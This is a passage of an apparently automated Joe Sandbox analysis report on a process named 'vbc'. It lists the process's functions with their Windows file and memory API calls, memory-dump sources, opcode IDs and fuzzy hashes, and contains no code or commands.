                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLanguageUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 95929093-0
                                                                                                                                                                      • Opcode ID: ee86f944570715989b0705386ccc5728ae79186a4a2428f9d2f7adef46ef7b6a
                                                                                                                                                                      • Instruction ID: a0c960a950a385429ac3e0259bafe29ee2421d745cb74183f7cd8a7ac04d02d5
                                                                                                                                                                      • Opcode Fuzzy Hash: ee86f944570715989b0705386ccc5728ae79186a4a2428f9d2f7adef46ef7b6a
                                                                                                                                                                      • Instruction Fuzzy Hash: 90E0922AD09542A6DE3183288D96374AE10BB11331FDD0693AE22B78E78659BE81B553
                                                                                                                                                                      Function 00F4C271 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,00000000,?), ref: 00F4C65E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: cb2ed9525345ef2913c2e152d8086b1a1c9c680d5159840467a551f06320751a
                                                                                                                                                                      • Instruction ID: 6b996d15a69a1e340430e126569453f933278961644ffda1ae1a1d6949769b23
                                                                                                                                                                      • Opcode Fuzzy Hash: cb2ed9525345ef2913c2e152d8086b1a1c9c680d5159840467a551f06320751a
                                                                                                                                                                      • Instruction Fuzzy Hash: F2F0652440E3C66FD753077498197A67FE5AF63374F096486DC80C6063E7948C15E752
                                                                                                                                                                      Function 00F4FE41 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4FE66
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: b99228d8cf271417cf073ae8d4e1b06aa863b2fb9f8ef7031e383e05b5f96f58
                                                                                                                                                                      • Instruction ID: 5e89fbe73306df4d4af3328a10da4916a1fd3834fb4cad9d8b5cff3707c80ea5
                                                                                                                                                                      • Opcode Fuzzy Hash: b99228d8cf271417cf073ae8d4e1b06aa863b2fb9f8ef7031e383e05b5f96f58
                                                                                                                                                                      • Instruction Fuzzy Hash: 17E0E521C04711ABC3204B09CC1DB3BBEE8AF91737F5A480CDF8845061CBB08C0CB692
                                                                                                                                                                      Function 00F4B079 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4B08B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 31ff1c43965f2e2b8abaeb18ab7e281c92f1a9e53eb879baaf3707e51aa944b5
                                                                                                                                                                      • Instruction ID: f0a362037ddf045f9f44d5e4f0454fe9ffb7d72f61de25cfa092ab0ecd3dfd57
                                                                                                                                                                      • Opcode Fuzzy Hash: 31ff1c43965f2e2b8abaeb18ab7e281c92f1a9e53eb879baaf3707e51aa944b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 66E0EDB5E49300CBE7258B468818B37BF608FA2731F08820DDC36462E2C3789C09AA13
                                                                                                                                                                      Function 00F49A08 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F49A3D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: cfe07ba302f4376a22d07a112c96459957e6b163bd0db5c98f841ea20d534aa5
                                                                                                                                                                      • Instruction ID: 2efe3475fe741e42b69d6f7d659dcbff08d4f7e4f0d29bec9ef4f79b41e566b3
                                                                                                                                                                      • Opcode Fuzzy Hash: cfe07ba302f4376a22d07a112c96459957e6b163bd0db5c98f841ea20d534aa5
                                                                                                                                                                      • Instruction Fuzzy Hash: 22E0E56694E3C25FD30307601C252A13FB09E43110B5A89D7D8C48A4A3C21C151EDB23
                                                                                                                                                                      Function 00F4B35C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4B33B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 008f1bf14851344518dde056cf710bcf0cc768ad2770c8415756519478260f85
                                                                                                                                                                      • Instruction ID: 8d9d1be8a1149b087fa6b9f0103dd7012d890e57a97ec258a9824b0febecd480
                                                                                                                                                                      • Opcode Fuzzy Hash: 008f1bf14851344518dde056cf710bcf0cc768ad2770c8415756519478260f85
                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0157044E3C59FE7024F6198283697FB0AF93210F9942CBD8A18B1E3C3788508EB62
                                                                                                                                                                      Function 00F49CB9 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 1dd650de6be0da22d35deb2c002320e127e27ae010829eccbdbc551b8856c8e1
                                                                                                                                                                      • Instruction ID: 98f06221d318bb7809733c0d2bd4f0623db682a6c01667779574cee33f906984
                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd650de6be0da22d35deb2c002320e127e27ae010829eccbdbc551b8856c8e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE0DF30F0DA12ABC6268E648889EB77FA5FF91B24F64051CEC518B090CBE4D805F751
                                                                                                                                                                      Function 00F4E7AB Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4E7B4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 7d3d6f5b5f969928d95597f190341564c11489168e90df52aadd8b860d18d205
                                                                                                                                                                      • Instruction ID: b385b493ab8d871ae189ad99a69af4b09dc9f1a0140d401270a055603cf60ab4
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d3d6f5b5f969928d95597f190341564c11489168e90df52aadd8b860d18d205
                                                                                                                                                                      • Instruction Fuzzy Hash: 66E09231D0EB864ADB664A2A880A3A53FA07F233B0B09479ADCF5861D1C710D918E711
                                                                                                                                                                      Function 00F4B75E Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: dd9a96de33f04dbe398beb7b31e344418af4a9b6ee74816e1c1b8e1da8412f3c
                                                                                                                                                                      • Instruction ID: 25ff7f77a564519a33817498f55df453a8e28b98deb88b53226a0a1494db8521
                                                                                                                                                                      • Opcode Fuzzy Hash: dd9a96de33f04dbe398beb7b31e344418af4a9b6ee74816e1c1b8e1da8412f3c
                                                                                                                                                                      • Instruction Fuzzy Hash: F9E08C33E082825BCB114B689C145A87F24EA91331F080466EE00C6067D325CE08EB91
                                                                                                                                                                      Function 00F49A85 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F49A3D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 29c4b7febdfc29949c08a1ed2fbf76035dac491a96ddd8eb9a922fcfe4cc18ca
                                                                                                                                                                      • Instruction ID: 0410960e9744f42ec5a852d9ede0bda64faa1f0371abe6649d8569dd93e526d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 29c4b7febdfc29949c08a1ed2fbf76035dac491a96ddd8eb9a922fcfe4cc18ca
                                                                                                                                                                      • Instruction Fuzzy Hash: F8E04F7094C7429FD3024F208804397BFE0FF96724F409949EDC485041E7BC4484EB43
                                                                                                                                                                      Function 00F4A5E0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4A5FB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 023de8fbe69e681f3e0e9196a55ee3b372ff6bf1a5cae3c5879f434fbf31ccfe
                                                                                                                                                                      • Instruction ID: f75a79706c9793484096915f1f88ffb5c19f5312633280ec62d1cbd8a029708c
                                                                                                                                                                      • Opcode Fuzzy Hash: 023de8fbe69e681f3e0e9196a55ee3b372ff6bf1a5cae3c5879f434fbf31ccfe
                                                                                                                                                                      • Instruction Fuzzy Hash: 91D0A9B2A0C7018BD700CF00988837AFBE0FB85310F00982EEA8A02280E7B54488FB03
                                                                                                                                                                      Function 00F4B80F Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4B82E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: b056509ead364be8d131f1d07558fcec7e68cae0d362a295ecab7e0dac22b6ca
                                                                                                                                                                      • Instruction ID: afd5351c16bd8d3214f100b390c51bb2592c37e35d57f28e7a5c581517f71fb1
                                                                                                                                                                      • Opcode Fuzzy Hash: b056509ead364be8d131f1d07558fcec7e68cae0d362a295ecab7e0dac22b6ca
                                                                                                                                                                      • Instruction Fuzzy Hash: E3D0A934009347AA97036A405C889B93B24BEC3320B5442AAF8A1041E2832C482AB722
                                                                                                                                                                      Function 00F4C13D Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4C14B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: a22fd4684bcd025d9d875fe7eb221d981aed75c7b1b53597d92982027d44c515
                                                                                                                                                                      • Instruction ID: e5746117e74c4f8965fb07f544566e2b7f97b9b2db4fe78c808a1e92b9fc67a3
                                                                                                                                                                      • Opcode Fuzzy Hash: a22fd4684bcd025d9d875fe7eb221d981aed75c7b1b53597d92982027d44c515
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CC08C2150E7C71FD703033028281497F613D031583CD00C7C4D0CA0DB828A40088B52
                                                                                                                                                                      Function 00F4F260 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4F26C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: f33ebe2f7134118f245645ea1797016b149447cbc0fbf348ae3c45991ab4a465
                                                                                                                                                                      • Instruction ID: f8287c26822fd91a0aa8271af4058af3314d2d3da86f6c9d708bb702029bb548
                                                                                                                                                                      • Opcode Fuzzy Hash: f33ebe2f7134118f245645ea1797016b149447cbc0fbf348ae3c45991ab4a465
                                                                                                                                                                      • Instruction Fuzzy Hash: D0C09B361452465FE70097D4DC5B7813FE0FE073107C90481994087150CB68A016EB02
                                                                                                                                                                      Function 00F4B0C9 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00F4B0D0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 91728b174b563eb17167a93fa6722b61c06da62623eff81193e248388853552c
                                                                                                                                                                      • Instruction ID: 13106e9898e9557be7e579ea4b65cce156e48869c5738432e723acaf4897f02a
                                                                                                                                                                      • Opcode Fuzzy Hash: 91728b174b563eb17167a93fa6722b61c06da62623eff81193e248388853552c
                                                                                                                                                                      • Instruction Fuzzy Hash: C7C04C6150D3C84EEB138B3548582AA3FF45D03255B59109BDDA2C64A3D714C94CE753
                                                                                                                                                                      Function 070BF790 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 070BF80E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2669985021.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_70b0000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 0698240d4224d3af33d10784ad27dff34b616bc0ad551c53fae00ebc3827c4e1
                                                                                                                                                                      • Instruction ID: fc97f5ba51318b5ebde931b56c518a70db8bc71335e963c7f79bbff50df7ddce
                                                                                                                                                                      • Opcode Fuzzy Hash: 0698240d4224d3af33d10784ad27dff34b616bc0ad551c53fae00ebc3827c4e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D31AAB4D012199FCB24CFAAD985ADEFBB4EB49310F14952AE815B7340C735A901CFA8
                                                                                                                                                                      Function 00F45D20 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cd5ab733aa6cd1fd1e91305b4c87389bbe8241a78b5b3fb38630f44ba5032426
                                                                                                                                                                      • Instruction ID: c394384a9c261baa73dee6decc576d85449e9bcdf306c114f24a8145c32b9e10
                                                                                                                                                                      • Opcode Fuzzy Hash: cd5ab733aa6cd1fd1e91305b4c87389bbe8241a78b5b3fb38630f44ba5032426
                                                                                                                                                                      • Instruction Fuzzy Hash: C0E08651D4CF00BBE63A37A85C1EBB1AE70AF13F3DF4D045AAE40550A796581C00F711
                                                                                                                                                                      Function 00F45D50 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F45D6D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                      • Opcode ID: 9b2100d64acd10f7036f46ddfc294f377e79af48fbb04402684876aa01600634
                                                                                                                                                                      • Instruction ID: dbe962482535b38b9a0cf3ecebc876abed9e0e2ab343334733ac3a4fdf820607
                                                                                                                                                                      • Opcode Fuzzy Hash: 9b2100d64acd10f7036f46ddfc294f377e79af48fbb04402684876aa01600634
                                                                                                                                                                      • Instruction Fuzzy Hash: 8BD0C920E0CF149BED3D3214FACC7302D345F10F30E0C8201AD011D2B745524C07BA02
                                                                                                                                                                      Function 00F48371 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 1ef981bd04a06d70a26eddb2e716912d4fb566df8dc381bf589b42a4e69392cf
                                                                                                                                                                      • Instruction ID: 8efa8fa670040a9606c6210b3c9e94b7f4a30c1b9a47c56fa0954607606fc931
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ef981bd04a06d70a26eddb2e716912d4fb566df8dc381bf589b42a4e69392cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 50B092A2909A80CEF7021A602C1D2E83F70E9123C6B090053CD42C8223EA188A067722
                                                                                                                                                                      Function 0730D600 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f083304abe81794d3b0e47986d38e8889e7e911a392f4e44a590b25f2d021ca2
                                                                                                                                                                      • Instruction ID: d763a45f87a15734f583b3d34430219741f5c5ac92ea16b95d01b34a411e2b2e
                                                                                                                                                                      • Opcode Fuzzy Hash: f083304abe81794d3b0e47986d38e8889e7e911a392f4e44a590b25f2d021ca2
                                                                                                                                                                      • Instruction Fuzzy Hash: 272136F9614608DFEB14DF50D9D0B16BFA5EB88320F648169D80D0F286C336D846CAE2
                                                                                                                                                                      Function 0730D5FB Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a06cec78edd30c5fa5f5d2641735210642f11197391936beb708901091f7d337
                                                                                                                                                                      • Instruction ID: 481e48a127a23d95bd15e2179aaaa0f9a71a3d483e464aa786ad7d0744658cf9
                                                                                                                                                                      • Opcode Fuzzy Hash: a06cec78edd30c5fa5f5d2641735210642f11197391936beb708901091f7d337
                                                                                                                                                                      • Instruction Fuzzy Hash: D711E1B6604684CFDB15CF50D5D4B16BFA2FB84320F24C1A9D84C0B256C336D456CBA2
                                                                                                                                                                      Function 0730D007 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3515c95cdb0e917eb9a8ef311d02bfe007e26ba02a455afbcd9a93722f45b33d
                                                                                                                                                                      • Instruction ID: 796060c4c692afbbd1288271fb4ae713c6f1c30a08f708410c63e7d14c67d51a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3515c95cdb0e917eb9a8ef311d02bfe007e26ba02a455afbcd9a93722f45b33d
                                                                                                                                                                      • Instruction Fuzzy Hash: AD015EB154D3C09FE7124B258C94792BFA8EF43224F1981DBE8888F1E3C2685C45CBB2
                                                                                                                                                                      Function 0730D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2682170133.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_730d000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: af9010683592200ecdfba12f3104a341d4fbe52e573bca7fdd3ed976d8e525fe
                                                                                                                                                                      • Instruction ID: 1d76c69723ec7d82b65edd1c111eefef4c217365c2412044dbc07f4b09815943
                                                                                                                                                                      • Opcode Fuzzy Hash: af9010683592200ecdfba12f3104a341d4fbe52e573bca7fdd3ed976d8e525fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 6601D4F06143409AF7204A51C884B67BFCCEF42225F08C059DC4C0B5C2C2789845CAF6

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 0055000C Relevance: 26.5, Strings: 21, Instructions: 273COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2613234924.0000000000550000.00000040.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_550000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: \I&$"pEl$'5PO$-N$w$-bY{$1m?$7c}:$=kF($B{,:$[4.*$^o}b$`.<>$f^>($nh2/$tN<z$zgRr${zi${95$c~t$cT$yS2
                                                                                                                                                                      • API String ID: 0-2956041983
                                                                                                                                                                      • Opcode ID: 5e536528996ec904011261ce2b9d3f9d546e9900a2f0e9b8f4598563413a5573
                                                                                                                                                                      • Instruction ID: 5ed38cbd2bea678983f08c358428fba645e292bf2ea16cc994f085502f92ce8c
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e536528996ec904011261ce2b9d3f9d546e9900a2f0e9b8f4598563413a5573
                                                                                                                                                                      • Instruction Fuzzy Hash: 2212C976442341CFCB8A8F26A2CA7D63B64BF15325F9C92B89D0D4D42BCB344684CF66
                                                                                                                                                                      Function 004A95E4 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2613234924.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Offset: 004A5000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_4a5000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
